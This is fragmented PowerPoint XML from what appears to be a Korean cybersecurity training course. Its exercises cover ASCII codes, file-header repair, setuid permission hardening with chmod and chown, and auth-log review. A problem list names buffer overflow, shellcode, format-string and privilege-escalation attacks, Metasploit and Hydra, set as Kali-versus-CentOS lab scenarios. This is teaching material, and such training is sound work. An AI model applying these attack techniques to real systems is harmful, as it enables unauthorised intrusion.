          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0262206-2E2A-43BB-9440-7AEAE680DA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391170" y="510638"/>
            <a:ext cx="5304079" cy="2513301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40189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xEl>
                                              <p:pRg st="16" end="1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
                                            <p:txEl>
                                              <p:pRg st="18" end="1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
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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표현종류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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C099D7-57F0-4ED9-8ADF-8DA0B84293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89" t="10654" r="3158" b="253"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2697960" y="2066307"/>
            <a:ext cx="5220902" cy="3823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651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ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>코드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858541"/>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어떻게 대화할까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귀여운 친구를 소개해볼까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임의의 친구 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>한명의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 영어이름을</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코드로 변환한 후</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 에게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학생은 들은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코드를 다시 문자정보로 변환하여 확인한다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87346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눈을 감아도 자꾸자꾸 생각나는 친구가 있다면</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ASCII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코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>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highlightClick="1"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AE917AD-767D-4748-B834-95D8FC627267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287486" y="541799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7494364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파일 헤더</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중요한 파일을 입수하였는데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도무지 열어볼 수 가 없다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>변조된것</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잘만 하면</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이 파일이 가진 헤더를 추측할 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>있을꺼</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파일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>복원하시오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헤더를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highlightClick="1"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AE917AD-767D-4748-B834-95D8FC627267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275610" y="499048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4788404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541702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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실습</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3891362623"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="2706182"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1248576">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1248576">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="82128855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Unit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사이버전 실습체계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단위과제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a:t>Scenario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A&amp;D</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Cipher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7">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수업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9741237"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="21107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Log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4438503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="175895">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348838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140716">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334361"/>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6153746"/>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351988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2296790"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2946CB6B-4B9C-485B-A290-AD01CEDB401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999074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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>단위과제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2082340209"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3112936" y="2690177"/>
          <a:ext cx="4932459" cy="1477645"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="446310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2841996">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1644153">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Sys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System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Net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Network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Malware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Cip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Cipher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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11566257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124767760"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="1953081"/>
          <a:ext cx="8563556" cy="3932054"/>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R-</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7"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8"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9"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FTP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서비스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0"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복귀주소 조작</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1"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쉘코드</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실행</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2"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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>BOF</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3"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Format String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4"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권한상승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5"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Metasploit</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6"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비인가 접근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Hydra</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문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId17"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475217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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 218">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1786AD2-BA00-48D3-80AD-6000488CA370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3018624" y="2310737"/>
            <a:ext cx="6154752" cy="2236526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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공격자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kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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linux</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의 모의침해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시스템 해킹</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실습하며</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이에 대응하여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방어자 </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CentOS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공격자가 더 이상 시스템에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위협을 가하지 못하도록</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시스템 설정 및 상황에 맞는 대응을 한다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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1898029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21" name="타원 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EA3498-44D9-4126-8ADF-3899C1F69090}"/>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22" name="타원 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CCDF5A-85A5-4C98-9665-F315AF2A0CD8}"/>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23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F148B84A-1565-4608-9272-50A6A6565E4D}"/>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24" name="직선 화살표 연결선 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4610B8D-63E4-47ED-B185-FA21102B7FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22"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8FDFAA55-7EBF-4AC8-8AE6-8EDF8B763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10" y="1690688"/>
            <a:ext cx="8238727" cy="4968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05918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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소유자를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변경하고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 및 일반에게는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소유자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chown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소유자명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권한을 설정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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31227227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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B355A65-614F-401A-B129-C717D97896BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537234" y="924349"/>
            <a:ext cx="4594860" cy="563880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E070F3A2-B311-45EC-847A-FC2D9F8F033A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547137" y="2386275"/>
            <a:ext cx="4617720" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A57801-35B0-4CFA-BF2E-0C3E36B41F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3543358739"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556470" y="3347160"/>
          <a:ext cx="4932807" cy="980186"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="48487242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 접근 권한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50103813"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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(r) =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실행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조합하여 접근 권한을 설정한다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예를 들어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 모두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7(4 + 2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지정하고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5(4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지정한다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672701"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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1)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rwsr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소유자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확인</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dirty="0"/>
              <a:t>2) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 접근 권한 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-x-r-x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 755 /bin/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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 소유자 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bin/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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93E2FFA-2307-4CB3-8A4F-B1B3CDB20E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537234" y="5334930"/>
            <a:ext cx="4556760" cy="708660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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22193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20" end="2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xEl>
                                              <p:pRg st="21" end="2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xEl>
                                              <p:pRg st="22" end="2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/Training/Unit/Sys/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 로그 점검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로그를 점검하여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계정으로 원격 접속을 시도한 호스트의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찾아내시오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내용 검색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: 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로그를 점검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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128867327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/var/log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로그에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>검색</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root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a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.174.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>했음을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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 후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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    로그에서 발견한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14757363-6E3B-4AF9-B363-510E4A430D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="595086" y="876481"/>
            <a:ext cx="5019040" cy="2900680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EBFE7B-6841-478B-8867-ACE3C2831DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
